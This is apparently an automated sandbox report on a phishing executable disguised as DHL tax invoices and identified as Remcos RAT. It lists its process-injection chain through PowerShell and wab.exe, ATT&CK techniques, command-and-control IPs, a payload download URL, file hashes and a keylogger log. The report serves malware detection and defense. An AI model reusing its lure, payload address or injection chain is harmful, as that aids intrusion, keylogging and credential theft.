              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe Code function: 0_2_10001112 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,GlobalLock,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatW,GlobalSize,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_10001112
              Source: wab.exe, 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerC
              Source: wab.exe, 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.dr Binary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe Code function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 7824, type: MEMORYSTR
              Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-EEMA4A
              Source: Yara match File source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 7824, type: MEMORYSTR
              Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
              Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Obfuscated Files or Information | LSASS Memory | 15 System Information Discovery | Remote Desktop Protocol | 11 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 212 Process Injection | 1 DLL Side-Loading | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Masquerading | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 112 Application Layer Protocol | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 212 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Behavior Graph ID: 1416845, Sample: DHL TAX INVOICES - MARCH 2024.exe, Startdate: 28/03/2024, Architecture: WINDOWS, Score: 100
              • DNS/IP: geoplugin.net
              • Signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 10 other signatures
              • Process: DHL TAX INVOICES - MARCH 2024.exe (started)
                Dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\Users\user\...\Handelshindringens.Dec, ASCII
                Signatures: Suspicious powershell command line found
              • Process: powershell.exe (started by DHL TAX INVOICES - MARCH 2024.exe)
                Dropped: C:\...\DHL TAX INVOICES - MARCH 2024.exe, PE32
                Signatures: Obfuscated command line found; Writes to foreign memory regions; Powershell drops PE file
                Started: wab.exe, conhost.exe, cmd.exe
              • Process: wab.exe (started by powershell.exe)
                DNS/IP: 162.251.122.89, 2404, 49737, 49738 UNREAL-SERVERSUS Canada; 83.137.157.76, 49736, 80 INVITECHHU Hungary; geoplugin.net 178.237.33.50, 49739, 80 ATOM86-ASATOM86NL Netherlands
                Dropped: C:\ProgramData\remcos\logs.dat, data
                Signatures: Detected Remcos RAT; Sample uses process hollowing technique; Installs a global keyboard hook
                Started: wab.exe, wab.exe, wab.exe, 33 other processes

              Source | Detection | Scanner | Label
              DHL TAX INVOICES - MARCH 2024.exe | 8% | ReversingLabs
              DHL TAX INVOICES - MARCH 2024.exe | 13% | Virustotal
              DHL TAX INVOICES - MARCH 2024.exe | 100% | Joe Sandbox ML

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe | 100% | Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll | 0% | ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll | 0% | Virustotal
              C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe | 8% | ReversingLabs
              C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe | 13% | Virustotal

              No Antivirus matches

              Source | Detection | Scanner | Label
              geoplugin.net | 3% | Virustotal

              Source | Detection | Scanner | Label
              http://www.imvu.comr | 0% | URL Reputation | safe
              http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
              https://contoso.com/License | 0% | URL Reputation | safe
              https://contoso.com/Icon | 0% | URL Reputation | safe
              http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
              https://contoso.com/ | 0% | URL Reputation | safe
              http://www.ebuddy.com | 0% | URL Reputation | safe
              162.251.122.89 | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp2 | 0% | Avira URL Cloud | safe
              http://83.137.157.76/gDuOvMZLyhtbvV140.bin | 0% | Avira URL Cloud | safe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gpe | 0% | Avira URL Cloud | safe
              http://83.137.157.76/gDuOvMZLyhtbvV140.bini | 0% | Avira URL Cloud | safe
              http://geoplugin.net/ | 0% | Avira URL Cloud | safe
              http://83.137.157.76/gDuOvMZLyhtbvV140.binQ | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp2 | 0% | Virustotal
              http://geoplugin.net/json.gpe | 0% | Virustotal
              http://geoplugin.net/ | 3% | Virustotal

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              geoplugin.net | 178.237.33.50 | true | false |  | unknown

              Name | Malicious | Antivirus Detection | Reputation
              http://83.137.157.76/gDuOvMZLyhtbvV140.bin | false | Avira URL Cloud: safe | unknown
              162.251.122.89 | true | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false |  | high
              http://www.imvu.comr | wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://geoplugin.net/json.gpe | wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmp | false |  | high
              https://contoso.com/License | powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://www.imvu.com | wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmp | false |  | high
              https://contoso.com/Icon | powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://geoplugin.net/json.gp2 | wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              http://nsis.sf.net/NSIS_ErrorError | DHL TAX INVOICES - MARCH 2024.exe, DHL TAX INVOICES - MARCH 2024.exe.1.dr | false |  | high
              https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmp | false |  | high
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.google.com | wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmp | false |  | high
              http://83.137.157.76/gDuOvMZLyhtbvV140.bini | wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/ | wab.exe, 00000007.00000002.2870944268.000000000898B000.00000004.00000020.00020000.00000000.sdmp | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
              https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.2314356147.00000000047A1000.00000004.00000800.00020000.00000000.sdmp | false |  | high
              https://contoso.com/ | powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false |  | high
              http://www.nirsoft.net/ | wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmp | false |  | high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2314356147.00000000047A1000.00000004.00000800.00020000.00000000.sdmp | false |  | high
              http://83.137.157.76/gDuOvMZLyhtbvV140.binQ | wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://www.ebuddy.com | wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown

                                  IP | Domain | Country | ASN | ASN Name | Malicious
                                  83.137.157.76 | unknown | Hungary | 12301 | INVITECHHU | false
                                  178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                  162.251.122.89 | unknown | Canada | 64236 | UNREAL-SERVERSUS | true

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1416845
                                  Start date and time:2024-03-28 08:00:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 28s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:44
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:DHL TAX INVOICES - MARCH 2024.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@5988/15@1/3
                                  EGA Information:
                                  • Successful, ratio: 33.3%
                                  HCA Information:
                                  • Successful, ratio: 93%
                                  • Number of executed functions: 86
                                  • Number of non-executed functions: 48
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 4908 because it is empty
                                  • Execution Graph export aborted for target wab.exe, PID 7824 because there are no executed function
                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                  Time | Type | Description
                                  08:00:51 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                                  08:02:33 | API Interceptor | 87x Sleep call for process: wab.exe modified
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):144
                                                          Entropy (8bit):3.318721553307006
                                                          Encrypted:false
                                                          SSDEEP:3:rhlKlrl9fVl1NVlVlClDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lWl55YcIeeDAlOWAv
                                                          MD5:010AFF889E6F61236043A30DE862D96B
                                                          SHA1:8DFE6A62C68CC197D90699993368BE9C0747A6B7
                                                          SHA-256:953B3D7020ADB40E5B815B993F37A00B68B656715B4E02252EEEF94339291A8C
                                                          SHA-512:23EE0773B648DC466DAA19C3448A98B91BD612E67921F46EDB4D2ABB61E65218219475A8B103F52561077226175DB585B3D0814479EA99A114788E0EC8066A63
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                          Preview:....[.2.0.2.4./.0.3./.2.8. .0.8.:.0.2.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):989
                                                          Entropy (8bit):5.019408940029604
                                                          Encrypted:false
                                                          SSDEEP:12:tkEU+nd6UGkMyGWKyGXPVGArwY3yGhsp+axH0sp+GYArpv/mOAaNO+ao9W7iN5zp:qydVauKyGX852sesPvXhNlT3/75ciWro
                                                          MD5:D3D1956DA737B1B3EF05DA28210D81B7
                                                          SHA1:40287B4136212BFD82AE0388DD3178721926FCDB
                                                          SHA-256:0BA354EA36476D11344D1E20DED0C3658FD39B6D436C916AE02FB1E7DC47D742
                                                          SHA-512:EA5BAF54FBB5BFD754308DCF2F9C77E9840BA8B194906060A77958F22CC76F5CDC317D68566EFEAD200D4934EF2DBECDBC3DCA089327AC7771136C9AE8AEB7D9
                                                          Malicious:false
                                                          Preview:{. "geoplugin_request":"102.165.48.43",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Washington",. "geoplugin_region":"District of Columbia",. "geoplugin_regionCode":"DC",. "geoplugin_regionName":"District of Columbia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.894",. "geoplugin_longitude":"-77.0365",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):8003
                                                          Entropy (8bit):4.838950934453595
                                                          Encrypted:false
                                                          SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                          MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                          SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                          SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                          SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                          Malicious:false
                                                          Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6656
                                                          Entropy (8bit):5.140229856656103
                                                          Encrypted:false
                                                          SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                          MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                          SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                          SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                          SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: REF_17218_VV-0002.exe, Detection: malicious, Browse
                                                          • Filename: PO_00290292.exe, Detection: malicious, Browse
                                                          • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                          • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                          • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                          • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                          • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                          • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                          • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                          • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2335299
                                                          Entropy (8bit):2.228536436984118
                                                          Encrypted:false
                                                          SSDEEP:12288:+YEsuweLDCe3BY0UGgh2ji7MaAzHcNkBLt:+YE4exYgpi7M3dLt
                                                          MD5:56CCB4A45C20BBA625A508FCD0F948EB
